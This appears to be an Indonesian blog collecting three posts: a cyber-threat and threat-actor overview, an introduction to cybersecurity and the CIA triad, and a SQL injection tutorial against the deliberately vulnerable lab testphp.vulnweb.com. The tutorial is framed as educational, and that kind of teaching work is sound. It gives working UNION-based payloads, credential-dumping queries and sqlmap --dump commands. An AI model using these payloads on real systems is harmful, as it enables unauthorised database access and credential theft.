Mengenal Ancaman Umum di Dunia Siber dan Siapa di Baliknya

Setelah pada artikel sebelumnya kita telah membahas pondasi dasar Cybersecurity dan CIA Triad, sekarang muncul sebuah pertanyaan: Sebenarnya, apa saja yang mengancam kita di internet? Dan siapakah individu atau kelompok yang memiliki niat untuk menyerang sistem tersebut?

Ancaman Umum di Dunia Siber

Serangan siber memiliki banyak bentuk. Berikut adalah tiga jenis ancaman yang paling sering kita temui dalam aktivitas digital sehari-hari:

1. Phishing (Penipuan Digital)

Phishing adalah teknik penipuan yang bertujuan untuk mencuri data pribadi Temen-temen, seperti kata sandi (password) atau data kartu kredit. Biasanya, penyerang mengirimkan email, SMS, atau tautan palsu yang menyamar sebagai situs resmi, misalnya institusi perbankan atau media sosial.

  • Ciri-ciri: Adanya kesan darurat (misalnya: "Akun Teman-temen terblokir!"), alamat email pengirim yang mencurigakan, serta tautan yang mengarah ke domain yang tidak dikenal.
  • Solusinya: Jangan terburu-buru mengeklik tautan. Selalu periksa alamat situs secara teliti dan lakukan verifikasi langsung ke sumber resminya jika Temen-temen merasa ragu.

Simulasi Nyata: Agar Temen-temen tidak penasaran mengenai bagaimana cara peretas (hacker) "memancing" korbannya, saya pernah membuat simulasi praktisnya dalam salah satu webinar saya. Di sana, saya mempraktikkan langsung bagaimana sebuah tautan palsu dapat mencuri data tanpa disadari. 

Tonton simulasinya di sini: Webinar Introduction to Cybersecurity - Phishing Lab

2. Malware (Malicious Software)

Sesuai namanya, ini adalah program jahat yang disisipkan ke perangkat Temen-temen tanpa izin. Malware memiliki banyak jenis, mulai dari Virus yang merusak berkas, Trojan yang menyamar sebagai aplikasi bermanfaat, hingga Spyware yang berfungsi untuk memantau aktivitas Temen-temen secara diam-diam.

  • Cara Mencegah: Pastikan Temen-temen hanya menginstal aplikasi dari sumber resmi (seperti Play Store atau App Store), selalu gunakan perangkat lunak antivirus yang diperbarui, dan hindari mengunduh berkas dari situs yang tidak terpercaya.

3. Ransomware (Penyanderaan Data)

Ini adalah jenis malware yang sangat diwaspadai. Ransomware akan mengunci seluruh berkas di komputer Temen-temen dan penyerang akan meminta uang tebusan (ransom) jika Temen-temen ingin berkas tersebut dapat diakses kembali.

Kasus Nyata:  WannaCry pada tahun 2017 yaitu serangan yang melumpuhkan ratusan ribu komputer di seluruh dunia, termasuk fasilitas kesehatan dan instansi pemerintah.

Cara Mencegah: Rutinlah melakukan pencadangan (backup) data di tempat yang berbeda, rajin memperbarui sistem operasi, dan jangan pernah membuka lampiran email dari pengirim yang tidak dikenal.

Threat Actor: Siapa Pelaku Serangan Siber?

Nah Temen-temen kan pasti kepo yah, siapa sih orang dibalik ini semua gitu. Jadi ada beberapa orang yang menjadi dalang dibaliknya bro, yaitu pertama ada yang namanya Hacker, nah pasti Temen-temen ngga asing kan dengar kata Hacker. Tapi tunggu dulu, tidak semuanya Hacker itu jahat ya... ada juga  yang baik juga lohh..., nah ini saya akan berikan kelompok/klasifikasinya berdasarkan etikanya juga.

Klasifikasi Hacker Berdasarkan "Topi"

  • White Hat Hacker: Sering disebut sebagai "Hacker Baik". Mereka meretas sistem dengan izin pemiliknya untuk menemukan celah keamanan dan memperbaikinya.
  • Black Hat Hacker: Inilah penjahat siber yang sebenarnya. Mereka meretas dengan niat jahat untuk mencuri data, merusak sistem, atau mencari keuntungan pribadi secara ilegal.
  • Grey Hat Hacker: Berada di tengah-tengah. Mereka mungkin meretas tanpa izin, tapi tidak bermaksud jahat. Biasanya mereka akan melaporkan celah yang ditemukan kepada pemilik sistem dan terkadang mengharapkan imbalan.

Advanced Persistent Threat (APT)

APT adalah sekelompok peretas yang memiliki keahlian tinggi dan menggunakan teknologi canggih untuk meretas sistem secara berkelanjutan dan tersembunyi. Mereka tidak hanya menyerang sekali, namun dapat bertahan lama di dalam jaringan target untuk mencuri data secara bertahap.

Kelompok Peretas Terkenal

Terdapat beberapa kelompok peretas atau ransomware group yang reputasinya sangat diwaspadai di dunia internasional, contohnya antara lain:

  • REvil
  • Conti
  • Lockbit

State-Sponsored Threat Actor

Ini adalah kelompok peretas yang didukung langsung atau didanai oleh suatu negara untuk kepentingan intelijen atau spionase. Beberapa contoh yang sering muncul dalam laporan keamanan dunia adalah:

  • APT 29: Sering dikaitkan dengan Rusia.
  • APT 38: Sering dikaitkan dengan Korea Utara, terutama untuk motif finansial.

Kesimpulan

Intinya, memahami siapa lawan kita dan metode apa yang mereka gunakan adalah langkah awal yang sangat penting agar kita tidak mudah menjadi korban. Dunia digital memang sangat luas dan penuh risiko, namun selama Temen-temen tetap waspada dan mau terus belajar, saya yakin kita bisa tetap beraktivitas dengan aman.

Oke, mungkin cukup segitu dulu, semoga bermanfaat dan bisa lebih menyadari untuk berhati-hati terhadap potensi ancaman di dunia digital bro! Stay safee!


Halo semua, kembali lagi dengan Saya Adelwin! Setelah kita bahas teknis SQL Injection, kali ini mau mundur selangkah buat bahas "Big Picture" nya: Apa sih sebenarnya Cybersecurity itu? Kenapa kita baik individu maupun organisasi harus peduli?

1. Apa Itu Cybersecurity?

Gampangnya, Cybersecurity adalah cara kita melindungi data, sistem, dan jaringan dari serangan digital.

Bayangin dunia digital itu kayak rumah. Rumah butuh pintu, pagar, kunci, bahkan satpam buat ngelindungin dari maling. Di dunia digital pun sama. Tujuannya supaya data kita nggak bocor, sistem nggak diretas, dan aktivitas online kita tetep aman terkendali.

2. Konteks Organisasi: Skala yang Lebih Besar

Kalau buat individu mungkin cuma soal amankan akun medsos, tapi buat organisasi atau perusahaan, skalanya jauh lebih besar. Organisasi butuh keamanan digital buat ngelindungin:

  • Data Pelanggan & Karyawan: Privasi itu mahal harganya!
  • Sistem Infrastruktur: Jangan sampai operasional mati total gara-gara serangan siber.
  • Reputasi: Sekali data bocor, kepercayaan pelanggan bisa hilang selamanya.

3. Pilar Utama: CIA Triad

Dalam Cybersecurity, ada konsep "suci" yang namanya CIA Triad. Ini adalah tiga pilar utama yang harus dijaga :

CONFIDENTIALITY (Kerahasiaan)

Memastikan data rahasia cuma bisa diakses oleh orang yang berhak. Jangan sampai informasi sensitif jatuh ke tangan yang salah.

INTEGRITY (Integritas)

Memastikan data tetap akurat dan konsisten. Nggak ada pihak luar yang mengubah atau memanipulasi data di tengah jalan.

AVAILABILITY (Ketersediaan)

Memastikan data atau layanan selalu siap diakses kapan pun dibutuhkan, baik oleh tim internal maupun publik.

4. Sejarah: Evolusi Ancaman Siber

Cybersecurity nggak muncul tiba-tiba. Dia berevolusi seiring dengan perkembangan teknologi internet:

  • 1960-an: Awal internet (ARPANET) diciptakan murni dibuat untuk komunikasi.
  • 1980-an: Semua orang dianggap “trusted” sampai muncul virus seperti Brain dan Morris Worm.
  • 1990-an: Internet makin luas (WWW muncul). Serangan mulai berkembang: hacker, malware, phishing.
  • 2025 - Sekarang: Serangan semakin canggih seperti Ransomware, serangan berbasis AI, dan Advanced Persistent Threat (APT).

5. Regulasi dan Dampaknya bagi Kita

Sekarang, keamanan data bukan cuma soal teknis, tapi soal hukum. Di Indonesia kita punya UU Pelindungan Data Pribadi (UU PDP) untuk melindungi hak privasi warga negara.

Dampaknya bagi kita apa?

  • Individu: Kelalaian bisa berujung pada pencurian identitas, akun medsos dibobol, hingga kerugian finansial.
  • Organisasi: Kebocoran data bisa bikin operasional lumpuh, kena denda hukum yang besar, dan kehilangan kepercayaan pasar.

Kesimpulan

Belajar Cybersecurity bukan cuma buat jadi hacker, tapi supaya kita bisa bertahan di tengah maraknya kejahatan di dunia digital saat ini. Stay safe, stay secure broww!

BELAJAR SQL INJECTION: DARI MANUAL HINGGA OTOMATIS (LAB: TESTPHP.VULNWEB.COM)

Halo semua! Setelah sekian lama nggak update, kali ini saya mau berbagi catatan belajar tentang salah satu celah keamanan paling legendaris: SQL Injection (SQLi). 


Kita akan menggunakan lab latihan dari Acunetix yaitu: http://testphp.vulnweb.com.
Ingat, tutorial ini hanya untuk tujuan edukasi dan pentesting legal ya!

1. MENCARI PINTU MASUK (RECONNAISSANCE)

Langkah pertama adalah mencari URL yang berkomunikasi langsung dengan database. Biasanya ditandai dengan adanya parameter ID di akhir URL.
Contoh:

- http://testphp.vulnweb.com/listproducts.php?cat=1
- http://testphp.vulnweb.com/product.php?pic=1

Kenapa? Karena parameter ini biasanya digunakan oleh backend untuk mengambil data dari tabel database. Website statis (seperti .html) biasanya lebih aman dari serangan jenis ini.

2. TESTING: MEMATAHKAN STRUKTUR QUERY


Setelah nemu target, kita coba tambahkan tanda petik tunggal (') di akhir ID untuk memicu error (syntax break).

Contoh: listproducts.php?cat=1'

Kenapa tanda petik? Karena dalam database, tanda petik harus berpasangan (pembuka dan penutup). Kalau kita tambahin satu di akhir, strukturnya jadi ganjil dan SQL-nya akan error.
Yang dicari: Pesan error yang spesifik. Kalau error-nya muncul, berarti pintunya "terbuka" (Vulnerable). Kalau halamannya cuma blank, itu namanya Blind SQL Injection (materi tingkat lanjut).


3. MENCARI JUMLAH KOLOM (ORDER BY)

Setelah tahu pintunya terbuka, kita perlu tahu ada berapa "kamar" (kolom) di dalam database tersebut menggunakan perintah ORDER BY.

Contoh: product.php?cat=1 ORDER BY 10-- -



Cara menentukannya:

- Coba angka 10, kalau halaman normal, berarti kolom ada 10 atau lebih.
- Coba angka 12, kalau halaman error/blank, berarti kolom kurang dari 12.
- Jika di angka 12 error dan di angka 11 normal, maka jumlah kolom fix adalah 11.



4. MENCARI "NOMOR AJAIB" (VULNERABLE COLUMN)

Kita perlu tahu kolom nomor berapa yang hasilnya muncul di halaman website menggunakan perintah UNION SELECT.

Contoh (jika kolom ada 11):

product.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11-- -

Trik Penting: Ubah ID menjadi negatif (cat=-1). Ini dilakukan supaya query asli server kosong, sehingga database dipaksa menampilkan hasil dari query UNION kita. Lihat angka yang muncul di layar (misal angka 7 dan 11). Itulah "nomor ajaib" kita.


5. EKSPLOITASI: DUMPING DATA (DIOS - DUMP IN ONE SHOT)

Gunakan nomor ajaib tadi untuk menyuntikkan perintah (query) untuk mengintip isi database.


- Mencari Nama Tabel:
(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())


- Mencari Nama Kolom (Misal pada tabel 'users'):
(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users')


- Mengambil Data (Username & Password):
(SELECT group_concat(uname,0x3a,pass) FROM users)



Setelah ketemu username dan password-nya, tinggal cari halaman login admin dan boom! Kita bisa masuk ke sistem.

   disini saya sudah menemukan halaman loginnya yaitu http://testphp.vulnweb.com/login.php, dan saya langsung masukkin username test dan password test tadi yang sudah ditemukan.


dan boom, kita sudah bisa masuk ke systemnya dengan kredensial tadi, dan disini di cek masuk sebagai user bernama relax😂.


6. PENGGUNAAN TOOLS SQLMAP (OTOMATIS)



Nah, setelah kita bahas cara manual yang lumayan ribet, sebenarnya ada cara yang jauh lebih praktis. Yup, ada versi otomatisnya juga buat eksploitasi SQLi, yaitu menggunakan tools sakti bernama SQLmap.


Tool ini biasanya sudah bawaan kalau lo pakai Kali Linux. Buat yang belum punya, bisa install dulu lewat terminal:

sudo apt-get install sqlmap -y

Kalau masih bingung perintahnya apa saja, tinggal panggil bantuan:
sqlmap -h

- Melihat Database:

sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" --dbs

- Melihat Tabel dalam Database (Misal DB: acuart):
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart --tables

- Melihat Kolom dalam Tabel (Misal Tabel: users):
sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart -T users --columns

- Dump Data Username dan Password:

sqlmap -u "http://testphp.vulnweb.com/product.php?pic=2" -D acuart -T users -C "uname,pass" --dump

KESIMPULAN

SQL Injection terjadi karena input dari user tidak difilter dengan baik. Cara terbaik mencegahnya adalah dengan menggunakan Prepared Statements (Parameterized Queries) agar input user tidak dianggap sebagai perintah SQL.


Stay safe dan gunakan ilmu ini dengan bijak!